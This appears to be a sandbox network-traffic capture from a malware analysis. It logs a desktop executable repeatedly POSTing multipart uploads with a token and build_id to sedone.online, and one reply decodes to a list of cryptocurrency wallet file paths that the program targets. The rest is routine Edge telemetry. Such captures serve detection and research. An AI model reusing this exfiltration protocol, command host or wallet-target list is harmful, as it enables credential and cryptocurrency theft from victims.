                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:40:10 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 36 46 4b 46 43 54 30 30 5a 55 33 45 33 37 39 30 30 52 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 36 46 4b 46 43 54 30 30 5a 55 33 45 33 37 39 30 30 52 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 36 46 4b 46 43 54 30 30 5a 55 33 45 33 37 39 30 30 52 51 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------K6FKFCT00ZU3E37900RQContent-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------K6FKFCT00ZU3E37900RQContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------K6FKFCT00ZU3E37900RQCont
2024-12-16 14:40:12 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:11 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
2024-12-16 14:40:12 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.7 | 49874 | 116.203.12.114 | 443 | 2000 | C:\Users\user\Desktop\dZKPE9gotO.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:40:12 UTC | 328 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----V37900RQQ9RQIEU37QQQ
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 262605
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:40:12 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 56 33 37 39 30 30 52 51 51 39 52 51 49 45 55 33 37 51 51 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 56 33 37 39 30 30 52 51 51 39 52 51 49 45 55 33 37 51 51 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 56 33 37 39 30 30 52 51 51 39 52 51 49 45 55 33 37 51 51 51 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------V37900RQQ9RQIEU37QQQContent-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------V37900RQQ9RQIEU37QQQContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------V37900RQQ9RQIEU37QQQCont
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:12 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:12 UTC16355OUTData Raw: 30 63 32 4e 79 5a 57 56 75 58 33 56 79 62 46 39 69 62 47 39 6a 61 33 4e 66 59 6e 6c 77 59 58 4e 7a 5a 57 52 66 59 32 39 31 62 6e 52 6c 63 69 42 4a 54 6c 52 46 52 30 56 53 4c 48 4e 74 59 58 4a 30 63 32 4e 79 5a 57 56 75 58 32 52 76 64 32 35 73 62 32 46 6b 58 32 4a 73 62 32 4e 72 63 31 39 6a 62 33 56 75 64 47 56 79 49 45 6c 4f 56 45 56 48 52 56 49 73 63 32 31 68 63 6e 52 7a 59 33 4a 6c 5a 57 35 66 5a 47 39 33 62 6d 78 76 59 57 52 66 59 6d 78 76 59 32 74 7a 58 32 4a 35 63 47 46 7a 63 32 56 6b 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 7a 62 57 46 79 64 48 4e 6a 63 6d 56 6c 62 6c 39 74 59 57 78 32 5a 58 4a 30 61 58 4e 70 62 6d 64 66 59 6d 78 76 59 32 74 7a 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 68 59 6e
                                                                                                                                                                                                                                                Data Ascii: 0c2NyZWVuX3VybF9ibG9ja3NfYnlwYXNzZWRfY291bnRlciBJTlRFR0VSLHNtYXJ0c2NyZWVuX2Rvd25sb2FkX2Jsb2Nrc19jb3VudGVyIElOVEVHRVIsc21hcnRzY3JlZW5fZG93bmxvYWRfYmxvY2tzX2J5cGFzc2VkX2NvdW50ZXIgSU5URUdFUixzbWFydHNjcmVlbl9tYWx2ZXJ0aXNpbmdfYmxvY2tzX2NvdW50ZXIgSU5URUdFUixhYn
                                                                                                                                                                                                                                                2024-12-16 14:40:12 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 14:40:14 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 Dec 2024 14:40:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.7 | 49882 | 116.203.12.114 | 443 | 2000 | C:\Users\user\Desktop\dZKPE9gotO.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:40:13 UTC | 328 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----T0HVAS00R1NYU3OPH4O8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 393697
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-16 14:40:13 UTC | 16355 | OUT | Data Ascii:
------T0HVAS00R1NYU3OPH4O8
Content-Disposition: form-data; name="token"

2afa0bd343ad19f9200a181fa83489aa
------T0HVAS00R1NYU3OPH4O8
Content-Disposition: form-data; name="build_id"

e411cf62bcba04d74fc6b505b9235404
------T0HVAS00R1NYU3OPH4O8
Cont
2024-12-16 14:40:15 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 Dec 2024 14:40:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.7 | 49876 | 23.58.157.24 | 443 | 5088 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:40:16 UTC | 751 | OUT | GET /statics/icons/favicon_newtabpage.png HTTP/1.1
Host: assets.msn.com
Connection: keep-alive
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                Cookie: _C_ETH=1; USRLOC=; MUID=360240197938679F2CDC554E78216658; _EDGE_S=F=1&SID=06106C5D388F6449242F790A39256585; _EDGE_V=1
                                                                                                                                                                                                                                                2024-12-16 14:40:16 UTC1038INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                                ETag: "bed4a7cc95f6106c7a3d46d2b50cb3f8:1614709529.490117"
                                                                                                                                                                                                                                                Last-Modified: Tue, 02 Mar 2021 18:25:29 GMT
                                                                                                                                                                                                                                                Server: AkamaiNetStorage
                                                                                                                                                                                                                                                Akamai-Loopback-Request: 8096267
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:16 GMT
                                                                                                                                                                                                                                                Content-Length: 354
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                Akamai-Request-BC: [a=23.216.133.71,b=106201228,c=g,n=US_NJ_PISCATAWAY,o=20940]
                                                                                                                                                                                                                                                Server-Timing: clientrtt; dur=2, clienttt; dur=1, origin; dur=0, cdntime; dur=1, wpo;dur=0,1s;dur=0
                                                                                                                                                                                                                                                Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                Akamai-Server-IP: 23.216.133.71
                                                                                                                                                                                                                                                Akamai-Request-ID: 654808c
                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
                                                                                                                                                                                                                                                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                Akamai-GRN: 0.4785d817.1734360016.654808c
                                                                                                                                                                                                                                                Vary: Origin


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.7 | 49902 | 116.203.12.114 | 443 | 2000 | C:\Users\user\Desktop\dZKPE9gotO.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:40:16 UTC | 328 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----5F3EKNYUK6FUAA1DT000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 131557
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-16 14:40:16 UTC | 16355 | OUT | Data Ascii:
------5F3EKNYUK6FUAA1DT000
Content-Disposition: form-data; name="token"

2afa0bd343ad19f9200a181fa83489aa
------5F3EKNYUK6FUAA1DT000
Content-Disposition: form-data; name="build_id"

e411cf62bcba04d74fc6b505b9235404
------5F3EKNYUK6FUAA1DT000
Cont
2024-12-16 14:40:18 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 Dec 2024 14:40:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-16 14:40:18 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                29192.168.2.749910116.203.12.1144432000C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:17 UTC329OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----R90RQ9HL6P8YU3ECJMOP
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 6990993
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-12-16 14:40:17 UTC | 16355 | OUT | Data Ascii: ------R90RQ9HL6P8YU3ECJMOPContent-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------R90RQ9HL6P8YU3ECJMOPContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------R90RQ9HL6P8YU3ECJMOPCont
2024-12-16 14:40:26 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:26 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.7 | 49873 | 20.110.205.119 | 443 | 5088 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:40:18 UTC | 1175 | OUT | GET /c.gif?rnd=1734365264027&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=14874f7f2a824b9dbbfbe14fe01fe973&activityId=14874f7f2a824b9dbbfbe14fe01fe973&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1
                                                                                                                                                                                                                                                Host: c.msn.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                Cookie: _C_ETH=1; USRLOC=; MUID=360240197938679F2CDC554E78216658; _EDGE_S=F=1&SID=06106C5D388F6449242F790A39256585; _EDGE_V=1
2024-12-16 14:40:19 UTC | 1108 | IN | HTTP/1.1 302 Redirect
                                                                                                                                                                                                                                                Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Location: https://c.bing.com/c.gif?rnd=1734365264027&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=14874f7f2a824b9dbbfbe14fe01fe973&activityId=14874f7f2a824b9dbbfbe14fe01fe973&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=B76581ECD2E1499D95A0E1CBD8614B37&RedC=c.msn.com&MXFR=360240197938679F2CDC554E78216658
                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                Set-Cookie: SM=T; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                Set-Cookie: MUID=360240197938679F2CDC554E78216658; domain=.msn.com; expires=Sat, 10-Jan-2026 14:40:18 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:18 GMT
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.7 | 49880 | 18.173.219.84 | 443 | 5088 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:40:18 UTC | 925 | OUT | GET /b?rn=1734365264028&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=360240197938679F2CDC554E78216658&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-16 14:40:18 UTC | 955 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:18 GMT
                                                                                                                                                                                                                                                Location: /b2?rn=1734365264028&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=360240197938679F2CDC554E78216658&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                                                                                                                set-cookie: UID=196c9ae1eb685612d5282a91734360018; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                set-cookie: XID=196c9ae1eb685612d5282a91734360018; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                Via: 1.1 0ee1fe5fcafe794371111733608557fe.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                X-Amz-Cf-Pop: JFK52-P1
                                                                                                                                                                                                                                                X-Amz-Cf-Id: iQlaREJ10tJtpzBsO0LoUWOF1MVct9rwd8yHujNYPlGIYAx0stABXQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.7 | 49916 | 116.203.12.114 | 443 | 2000 | C:\Users\user\Desktop\dZKPE9gotO.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:40:19 UTC | 325 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----7QQIEKNGVAAAAIE3O8Q1
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-12-16 14:40:19 UTC | 331 | OUT | Data Ascii: ------7QQIEKNGVAAAAIE3O8Q1Content-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------7QQIEKNGVAAAAIE3O8Q1Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------7QQIEKNGVAAAAIE3O8Q1Cont
2024-12-16 14:40:20 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:20 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
2024-12-16 14:40:20 UTC | 2228 | IN | Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.7 | 49918 | 18.173.219.84 | 443 | 5088 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:40:20 UTC | 1012 | OUT | GET /b2?rn=1734365264028&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=360240197938679F2CDC554E78216658&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                Cookie: UID=196c9ae1eb685612d5282a91734360018; XID=196c9ae1eb685612d5282a91734360018
2024-12-16 14:40:20 UTC | 326 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:20 GMT
                                                                                                                                                                                                                                                Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                Via: 1.1 73c72f4ba985fa512968a14b5bd2f576.cloudfront.net (CloudFront)
